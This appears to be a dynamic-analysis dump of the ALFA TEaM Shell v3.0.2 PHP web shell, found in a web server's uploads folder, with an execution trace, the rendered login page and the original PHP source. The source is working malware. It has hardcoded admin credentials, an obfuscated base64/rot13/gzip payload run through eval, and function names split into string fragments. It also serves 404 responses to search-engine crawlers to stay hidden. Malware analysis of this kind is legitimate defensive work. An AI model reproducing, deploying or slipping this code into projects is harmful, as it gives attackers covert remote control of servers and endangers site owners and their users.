2	90	0	0.122538	2355936	define	0		/var/www/html/uploads/alfa.php	29	2	'__PATH_HISTORY__'	'path_history_96e9c95994dd10d445a4d75f32a5faa1'
2	90	1	0.122554	2356040
2	90	R			TRUE
2	91	0	0.122567	2355968	define	0		/var/www/html/uploads/alfa.php	30	2	'__ALFA_POST_ENCRYPTION__'	TRUE
2	91	1	0.122581	2356072
2	91	R			TRUE
1		A						/var/www/html/uploads/alfa.php	31	GLOBALS['__ALFA_COLOR__'] = ['shell_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'header_vars' => '#27979B', 'header_values' => '#67ABDF', 'header_on' => '#00FF00', 'header_off' => '#ff0000', 'header_none' => '#00FF00', 'home_shell' => '#ff0000', 'home_shell:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'back_shell' => '#efbe73', 'back_shell:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'header_pwd' => '#00FF00', 'header_pwd:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'header_drive' => '#00FF00', 'header_drive:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'header_show_all' => '#00FF00', 'disable_functions' => '#ff0000', 'footer_text' => '#27979B', 'menu_options' => '#27979B', 'menu_options:hover' => ['key_color' => '#646464', 'multi_selector' => [...]], 'options_list' => ['key_color' => '#00FF00', 'multi_selector' => [...]], 'options_list:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'options_list_header' => ['key_color' => '#59cc33', 'multi_selector' => [...]], 'options_list_text' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'Alfa+' => ['key_color' => '#27E8AE', 'multi_selector' => [...]], 'hidden_shell_text' => ['key_color' => '#00FF00', 'multi_selector' => [...]], 'hidden_shell_version' => '#ff0000', 'shell_name' => '#FF0000', 'main_row:hover' => ['key_color' => '#646464', 'multi_selector' => [...]], 'main_header' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'main_name' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'main_size' => '#67ABDF', 'main_modify' => '#67ABDF', 'main_owner_group' => '#67ABDF', 'main_green_perm' => '#25ff00', 'main_red_perm' => '#FF0000', 'main_white_perm' => '#FFFFFF', 'beetween_perms' => '#FFFFFF', 'main_actions' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'minimize_editor_background' => ['key_color' => '#0e304a', 'multi_selector' => [...]], 'minimize_editor_text' => ['key_color' => '#f5deb3', 'multi_selector' => [...]], 'editor_border' => ['key_color' => '#0e304a', 'multi_selector' => [...]], 'editor_background' => ['key_color' => 'rgba(0, 1, 23, 0.94)', 'multi_selector' => [...]], 'editor_header_background' => ['key_color' => 'rgba(21, 66, 88, 0.93)', 'multi_selector' => [...]], 'editor_header_text' => ['key_color' => '#00ff7f', 'multi_selector' => [...]], 'editor_header_button' => ['key_color' => '#1d5673', 'multi_selector' => [...]], 'editor_actions' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'editor_file_info_vars' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'editor_file_info_values' => ['key_color' => '#67ABDF', 'multi_selector' => [...]], 'editor_history_header' => ['key_color' => '#14ff07', 'multi_selector' => [...]], 'editor_history_list' => ['key_color' => '#03b3a3', 'multi_selector' => [...]], 'editor_history_selected_file' => ['key_color' => 'rgba(49, 55, 93, 0.77)', 'multi_selector' => [...]], 'editor_history_file:hover' => ['key_color' => '#646464', 'multi_selector' => [...]], 'input_box_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'input_box_text' => ['key_color' => '#999999', 'multi_selector' => [...]], 'input_box:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'select_box_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'select_box_text' => ['key_color' => '#FFFFEE', 'multi_selector' => [...]], 'select_box:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'button_border' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'button:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'outputs_text' => ['key_color' => '#67ABDF', 'multi_selector' => [...]], 'outputs_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'uploader_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'uploader_background' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'uploader_text_right' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'uploader_text_left' => ['key_color' => '#25ff00', 'multi_selector' => [...]], 'uploader:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'uploader_progress_bar' => ['key_color' => '#ff0000', 'multi_selector' => [...]], 'mysql_tables' => '#00FF00', 'mysql_table_count' => '#67ABDF', 'copyright' => '#ff0000', 'scrollbar' => ['key_color' => '#1e82b5', 'multi_selector' => [...]], 'scrollbar_background' => ['key_color' => '#000115', 'multi_selector' => [...]]]
2	92	0	0.122722	2356000	preg_replace	0		/var/www/html/uploads/alfa.php	357	3	'!\\(\\d+\\)\\s.*!'	''	'/var/www/html/uploads/alfa.php'
2	92	1	0.122757	2356096
2	92	R			'/var/www/html/uploads/alfa.php'
2	93	0	0.122773	2356000	trim	0		/var/www/html/uploads/alfa.php	357	1	'/var/www/html/uploads/alfa.php'
2	93	1	0.122786	2356032
2	93	R			'/var/www/html/uploads/alfa.php'
2	94	0	0.122801	2356000	str_replace	0		/var/www/html/uploads/alfa.php	357	3	'\\'	'/'	'/var/www/html/uploads/alfa.php'
2	94	1	0.122816	2356096
2	94	R			'/var/www/html/uploads/alfa.php'
1		A						/var/www/html/uploads/alfa.php	357	GLOBALS['__file_path'] = '/var/www/html/uploads/alfa.php'
1		A						/var/www/html/uploads/alfa.php	358	$config = ['AlfaUser' => 'admin', 'AlfaPass' => 'a6f452ec3293d7fb72c5b677257b20ec', 'AlfaProtectShell' => '1', 'AlfaLoginPage' => 'gui']
2	95	0	0.122868	2356376	session_start	0		/var/www/html/uploads/alfa.php	359	0
2	95	1	0.122884	2356376
2	95	R			TRUE
1		A						/var/www/html/uploads/alfa.php	361	$SERVER_SIG = '<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>\n'
1		A						/var/www/html/uploads/alfa.php	362	$Eform = '<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>'
2	96	0	0.122931	2356376	md5	0		/var/www/html/uploads/alfa.php	364	1	'a6f452ec3293d7fb72c5b677257b20ec'
2	96	1	0.122945	2356472
2	96	R			'1fd37e771a1c807e6b03fa3f7debf066'
			0.123012	2272032
TRACE END   [2023-02-12 22:31:37.076611]

Generated HTML code
<html><head><style>
body{background: black;}
#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
#loginbox td { border-radius:5px; font-size:11px; }
</style>
<title>~ ALFA TEaM Shell-v3.0.2 ~</title></head><body><center>
<center><img style="border-radius:100px;" width="500" height="250" alt="" src="http://solevisible.com/images/alfa-iran.png"></center>
<div id="loginbox"><p><font face="verdana,arial" size="-1">
</font></p><center><table cellpadding="2" cellspacing="0" border="0" id="ap_table">
<tbody><tr><td bgcolor="green"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td bgcolor="green" align="center" style="padding:2;padding-bottom:4"><b><font color="white" size="-1" face="verdana,arial"><b>~ ALFA TEaM Shell-v3.0.2 ~</b></font></b></td></tr>
<tr><td bgcolor="black" style="padding:5">
<form method="post">
<input type="hidden" name="action" value="login">
<input type="hidden" name="hide" value="">
<center><table>
<tbody><tr><td><font color="green" face="verdana,arial" size="-1">Login:</font></td><td><input type="text" size="30" name="usrname" placeholder="username" onfocus="if (this.value == 'username'){this.value = '';}"></td></tr>
<tr><td><font color="green" face="verdana,arial" size="-1">Password:</font></td><td><input type="password" size="30" name="password" placeholder="password" onfocus="if (this.value == 'password') this.value = '';"></td></tr>
<tr><td><font face="verdana,arial" size="-1">&nbsp;</font></td><td><font face="verdana,arial" size="-1"><input type="submit" value="Login"></font></td></tr></tbody></table>
<br></center></form></td></tr></tbody></table></td></tr></tbody></table></center></div></center></body></html>
Original PHP code
<?php
$GLOBALS['NeUSMyPGXP'] = array(
	'usmfzmlHFCje' => 'admin',//login username
	'paLDRhHfAovu' => 'a6f452ec3293d7fb72c5b677257b20ec',//login password (MD5)... ehsan
	'saEuEgnDlHuL' => '1',//safe mode.. 0 = allow, 1 = deny
	'logXKTfQPNcx' => 'gui',//safe mode type.. gui = login and HTTP errors accepted: 500, 404, 403
	'shiJVQhUrFkw' => '1',//show icons.. 0 = not show, 1 = show
	'pogkUzMiAjqB' => true,//POST encryption
);
error_reporting(0);
eval(str_rot13(gzinflate(str_rot13(base64_decode('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')))));

$XDmfxOnhck='fu'.'nct'.'ion'.'_'.'e'.'x'.'is'.'ts'.'';$RxPWPyQqTL='cha'.'r'.'Cod'.'e'.'A'.'t'.'';$CyvIHOdCHU='e'.'va'.'l'.'';$jgpUDiTPrk='g'.'zi'.'nf'.'l'.'at'.'e'.'';if(!$XDmfxOnhck('bas'.'e'.'6'.'4_e'.'ncod'.'e'.'')){function nIWUkxhnhj($data){if(empty($data))return;$b64='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';$o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;$ac = 0;$enc = '';$tmp_arr = array();if(!$data){return $data;}do{$o1 = $RxPWPyQqTL($data, $i++);$o2 = $RxPWPyQqTL($data, $i++);$o3 = $RxPWPyQqTL($data, $i++);$bits = $o1 << 16 | $o2 << 8 | $o3;$h1 = $bits >> 18 & 0x3f;$h2 = $bits >> 12 & 0x3f;$h3 = $bits >> 6 & 0x3f;$h4 = $bits & 0x3f;$tmp_arr[$ac++] = charAt($b64, $h1).charAt($b64, $h2).charAt($b64, $h3).charAt($b64, $h4);} while ($i < strlen($data));$enc = implode($tmp_arr, '');$r = (strlen($data) % 3);return ($r ? substr($enc, 0, ($r - 3)) : $enc).substr('===', ($r || 3));}function charCodeAt($data, $char){ return ord(substr($data, $char, 1));}function charAt($data, $char){return substr($data, $char, 1);}}else{function nIWUkxhnhj($s){$b='bas'.'e'.'6'.'4_e'.'ncod'.'e'.'';return $b($s);}}if(!$XDmfxOnhck('b'.'ase'.'6'.'4_deco'.'d'.'e')){function QFdAWqZnUX($input){if(empty($input))return;$keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";$chr1 = $chr2 = $chr3 = "";$enc1 = $enc2 = $enc3 = $enc4 = "";$i = 0;$output = "";$input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input);do{$enc1 = strpos($keyStr, substr($input, $i++, 1));$enc2 = strpos($keyStr, substr($input, $i++, 1));$enc3 = strpos($keyStr, substr($input, $i++, 1));$enc4 = strpos($keyStr, substr($input, $i++, 1));$chr1 = ($enc1 << 2) | ($enc2 >> 4);$chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2);$chr3 = (($enc3 & 3) << 6) | $enc4;$output = $output . chr((int) $chr1);if ($enc3 != 64) {$output = $output . chr((int) $chr2);}if ($enc4 != 64) {$output = $output . chr((int) $chr3);}$chr1 = $chr2 = $chr3 = "";$enc1 = $enc2 = $enc3 = $enc4 = "";}while($i < strlen($input));return $output;}}else{function QFdAWqZnUX($s){$b='b'.'ase'.'6'.'4_deco'.'d'.'e';return $b($s);}}$gEleJRqGNj='create_fun'.'ct'.'io'.'n';$oFcbuslxiL = $gEleJRqGNj('$cq',$CyvIHOdCHU.'('.$jgpUDiTPrk.'('.'Q'.'FdAW'.'qZ'.'n'.'U'.'X'.''.'($cq)'.')'.')'.';');

/* ufBAyNiLYhXtEhSseNmZlGuuOwOGcBLTnsgEApHxXujFVanOXqNpNWAMnYLMAGHaHTpIuoJkmboVlvpvaebpEaoskOINIUDeEhGI */ /* You're killing me again 🎧 Am I still in your head ? 🎧 You used to light me up 🎧 Now you shut me down -- Solevisible */ @session_start();function __ZW5jb2Rlcg($s){return nIWUkxhnhj($s);}function __ZGVjb2Rlcg($s){return QFdAWqZnUX($s);}$GLOBALS['DB_NAME'] = $GLOBALS['NeUSMyPGXP'];$check = false;if(!isset($_SESSION["alfa_settings_signature"])){$check = true;}else{if($_SESSION["alfa_settings_signature"] != md5(print_r($GLOBALS['DB_NAME'], true))){$check = true;}}if($check){$_SESSION["alfa_settings_signature"] = md5(print_r($GLOBALS['DB_NAME'], true));foreach($GLOBALS['NeUSMyPGXP'] as $key => $value){$prefix = substr($key, 0, 2);if($prefix == "us"){$GLOBALS['DB_NAME']["user"] = $value;$GLOBALS['DB_NAME']["user_rand"] = $key;}elseif($prefix == "pa"){$GLOBALS['DB_NAME']["pass"] = $value;$GLOBALS['DB_NAME']["pass_rand"] = $key;}elseif($prefix == "sa"){$GLOBALS['DB_NAME']["safemode"] = $value;$GLOBALS['DB_NAME']["safemode_rand"] = $key;}elseif($prefix == "lo"){$GLOBALS['DB_NAME']["login_page"] = $value;$GLOBALS['DB_NAME']["login_page_rand"] = $key;}elseif($prefix == "sh"){$GLOBALS['DB_NAME']["show_icons"] = $value;$GLOBALS['DB_NAME']["show_icons_rand"] = $key;}elseif($prefix == "po"){$GLOBALS['DB_NAME']["post_encryption"] = $value;$GLOBALS['DB_NAME']["post_encryption_rand"] = $key;}}$_SESSION["alfa_db_settings"] = $GLOBALS['DB_NAME'];}else{$GLOBALS['DB_NAME'] = $_SESSION["alfa_db_settings"];}unset($GLOBALS['NeUSMyPGXP']); if(!isset($_SERVER["HTTP_HOST"]))exit();


if(!empty($_SERVER['HTTP_USER_AGENT'])){$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider");if(preg_match('/'.implode('|',$userAgents).'/i',$_SERVER['HTTP_USER_AGENT'])){header('HTTP/1.0 404 Not Found');exit;}}
if(!isset($GLOBALS['DB_NAME']['user']))exit('$GLOBALS[\'DB_NAME\'][\'user\']');
if(!isset($GLOBALS['DB_NAME']['pass']))exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
if(!isset($GLOBALS['DB_NAME']['safemode']))exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
if(!isset($GLOBALS['DB_NAME']['login_page']))exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
if(!isset($GLOBALS['DB_NAME']['show_icons']))exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
if(!isset($GLOBALS['DB_NAME']['post_encryption']))exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
date_default_timezone_set('Asia/Tehran');
define("__ALFA_MD5NAME__", md5($_SERVER["SCRIPT_FILENAME"]));
define("__ALFA_VERSION__", "3.0.2");
define("__LAST_CWD__", "last_cwd_".__ALFA_MD5NAME__);
define("__PATH_HISTORY__", "path_history_".__ALFA_MD5NAME__);
define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"])&&$GLOBALS["DB_NAME"]["post_encryption"]==true?true:false));
$GLOBALS['__ALFA_COLOR__'] = array(
		"shell_border" => array(
			"key_color" => "#0E304A",
			"multi_selector" => array(
				".header" => "border: 7px solid {color}",
				"#meunlist" => "border-color: {color}",
				"#hidden_sh" => "background-color: {color}",
				".ajaxarea" => "border: 1px solid {color}",
				".foot" => "border-color: {color}",
			)
		),
		"header_vars" => "#27979B",
		"header_values" => "#67ABDF",
		"header_on" => "#00FF00",
		"header_off" => "#ff0000",
		"header_none" => "#00FF00",
		"home_shell" => "#ff0000",
		"home_shell:hover" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".home_shell:hover" => "color: {color};",
			)
		),
		"back_shell" => "#efbe73",
		"back_shell:hover" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".back_shell:hover" => "color: {color};",
			)
		),
		"header_pwd" => "#00FF00",
		"header_pwd:hover" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".header_pwd:hover" => "color: {color};",
			)
		),
		"header_drive" => "#00FF00",
		"header_drive:hover" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".header_drive:hover" => "color: {color};",
			)
		),
		"header_show_all" => "#00FF00",
		"disable_functions" => "#ff0000",
		"footer_text" => "#27979B",
		"menu_options" => "#27979B",
		"menu_options:hover" => array(
			"key_color" => "#646464",
			"multi_selector" => array(
				".menu_options:hover" => "background-color: {color};font-weight: unset;",
			)
		),
		"options_list" => array(
			"key_color" => "#00FF00",
			"multi_selector" => array(
				".ajaxarea .header center a" => "color: {color};",
			)
		),
		"options_list:hover" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".ajaxarea .header center a:hover" => "color: {color};",
			)
		),
		"options_list_header" => array(
			"key_color" => "#59cc33",
			"multi_selector" => array(
				".txtfont_header" => "color: {color};",
			)
		),
		"options_list_text" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".txtfont,.tbltxt" => "color: {color};",
			)
		),
		"Alfa+" => array(
			"key_color" => "#27E8AE",
			"multi_selector" => array(
				".alfa_plus" => "color: {color};font-weight: unset;",
			)
		),
		"hidden_shell_text" => array(
			"key_color" => "#00FF00",
			"multi_selector" => array(
				"#hidden_sh a" => "color: {color};",
			)
		),
		"hidden_shell_version" => "#ff0000",
		"shell_name" => "#FF0000",
		"main_row:hover" => array(
			"key_color" => "#646464",
			"multi_selector" => array(
				".main tr:hover" => "background-color: {color};",
			)
		),
		"main_header" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".main th" => "color: {color};",
			)
		),
		"main_name" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".main .main_name" => "color: {color};font-weight: unset;",
			)
		),
		"main_size" => "#67ABDF",
		"main_modify" => "#67ABDF",
		"main_owner_group" => "#67ABDF",
		"main_green_perm" => "#25ff00",
		"main_red_perm" => "#FF0000",
		"main_white_perm" => "#FFFFFF",
		"beetween_perms" => "#FFFFFF",
		"main_actions" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".main .actions" => "color: {color};",
			)
		),
		"menu_options:hover" => array(
			"key_color" => "#646464",
			"multi_selector" => array(
				".menu_options:hover" => "background-color: {color};font-weight: unset;",
			)
		),
		"minimize_editor_background" => array(
			"key_color" => "#0e304a",
			"multi_selector" => array(
				".minimized-wrapper" => "background-color: {color};",
			)
		),
		"minimize_editor_text" => array(
			"key_color" => "#f5deb3",
			"multi_selector" => array(
				".minimized-text" => "color: {color};",
			)
		),
		"editor_border" => array(
			"key_color" => "#0e304a",
			"multi_selector" => array(
				".editor-explorer,.editor-modal" => "border: 2px solid {color};",
			)
		),
		"editor_background" => array(
			"key_color" => "rgba(0, 1, 23, 0.94)",
			"multi_selector" => array(
				".editor-explorer,.editor-modal" => "background-color: {color};",
			)
		),
		"editor_header_background" => array(
			"key_color" => "rgba(21, 66, 88, 0.93)",
			"multi_selector" => array(
				".editor-header" => "background-color: {color};",
			)
		),
		"editor_header_text" => array(
			"key_color" => "#00ff7f",
			"multi_selector" => array(
				".editor-path" => "color: {color};",
			)
		),
		"editor_header_button" => array(
			"key_color" => "#1d5673",
			"multi_selector" => array(
				".close-button, .editor-minimize" => "background-color: {color};",
			)
		),
		"editor_actions" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".editor_actions" => "color: {color};",
			)
		),
		"editor_file_info_vars" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".editor_file_info_vars" => "color: {color};",
			)
		),
		"editor_file_info_values" => array(
			"key_color" => "#67ABDF",
			"multi_selector" => array(
				".filestools" => "color: {color};",
			)
		),
		"editor_history_header" => array(
			"key_color" => "#14ff07",
			"multi_selector" => array(
				".hheader-text,.history-clear" => "color: {color};",
			)
		),
		"editor_history_list" => array(
			"key_color" => "#03b3a3",
			"multi_selector" => array(
				".editor-file-name" => "color: {color};",
			)
		),
		"editor_history_selected_file" => array(
			"key_color" => "rgba(49, 55, 93, 0.77)",
			"multi_selector" => array(
				".is_active" => "background-color: {color};",
			)
		),
		"editor_history_file:hover" => array(
			"key_color" => "#646464",
			"multi_selector" => array(
				".file-holder > .history:hover" => "background-color: {color};",
			)
		),
		"input_box_border" => array(
			"key_color" => "#0E304A",
			"multi_selector" => array(
				"input[type=text],textarea" => "border: 1px solid {color}",
			)
		),
		"input_box_text" => array(
			"key_color" => "#999999",
			"multi_selector" => array(
				"input[type=text],textarea" => "color: {color};",
			)
		),
		"input_box:hover" => array(
			"key_color" => "#27979B",
			"multi_selector" => array(
				"input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
			)
		),
		"select_box_border" => array(
			"key_color" => "#0E304A",
			"multi_selector" => array(
				"select" => "border: 1px solid {color}",
			)
		),
		"select_box_text" => array(
			"key_color" => "#FFFFEE",
			"multi_selector" => array(
				"select" => "color: {color};",
			)
		),
		"select_box:hover" => array(
			"key_color" => "#27979B",
			"multi_selector" => array(
				"select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
			)
		),
		"button_border" => array(
			"key_color" => "#27979B",
			"multi_selector" => array(
				"input[type=submit],.button,#addup" => "border: 1px solid {color};",
			)
		),
		"button:hover" => array(
			"key_color" => "#27979B",
			"multi_selector" => array(
				"input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};",
				".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
			)
		),
		"outputs_text" => array(
			"key_color" => "#67ABDF",
			"multi_selector" => array(
				".ml1" => "color: {color};",
			)
		),
		"outputs_border" => array(
			"key_color" => "#0E304A",
			"multi_selector" => array(
				".ml1" => "border: 1px solid {color};",
			)
		),
		"uploader_border" => array(
			"key_color" => "#0E304A",
			"multi_selector" => array(
				".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};",
			)
		),
		"uploader_background" => array(
			"key_color" => "#0E304A",
			"multi_selector" => array(
				".inputfile strong" => "background-color: {color};",
			)
		),
		"uploader_text_right" => array(
			"key_color" => "#FFFFFF",
			"multi_selector" => array(
				".inputfile strong" => "color: {color};",
			)
		),
		"uploader_text_left" => array(
			"key_color" => "#25ff00",
			"multi_selector" => array(
				".inputfile span" => "color: {color};",
			)
		),
		"uploader:hover" => array(
			"key_color" => "#27979B",
			"multi_selector" => array(
				".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};",
			)
		),
		"uploader_progress_bar" => array(
			"key_color" => "#ff0000",
			"multi_selector" => array(
				"#up_bar" => "background-color: {color};",
			)
		),
		"mysql_tables" => "#00FF00",
		"mysql_table_count" => "#67ABDF",
		"copyright" => "#ff0000",
		"scrollbar" => array(
			"key_color" => "#1e82b5",
			"multi_selector" => array(
				"*::-webkit-scrollbar-thumb" => "background-color: {color};",
			)
		),
		"scrollbar_background" => array(
			"key_color" => "#000115",
			"multi_selector" => array(
				"*::-webkit-scrollbar-track" => "background-color: {color};",
			)
		),
);
$GLOBALS['__file_path'] = str_replace('\\','/',trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__)));
$config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
@session_start();
if($config['AlfaProtectShell']){
$SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"])?$_SERVER["SERVER_SIGNATURE"]:"");
$Eform='<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
if($config['AlfaLoginPage'] == 'gui'){
if(@$_SESSION["AlfaUser"] != $config['AlfaUser'] && @$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])){
if(@$_POST["usrname"]==$config['AlfaUser'] && @md5($_POST["password"])==$config['AlfaPass']){
@$_SESSION["AlfaUser"] = $config['AlfaUser'];
@$_SESSION["AlfaPass"] = @md5($config['AlfaPass']);
@header('location: '.$_SERVER["PHP_SELF"]);
}
echo '
<style>
body{background: black;}
#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
#loginbox td { border-radius:5px; font-size:11px; }
</style>
<title>~ ALFA TEaM Shell-v'.__ALFA_VERSION__.' ~</title><center>
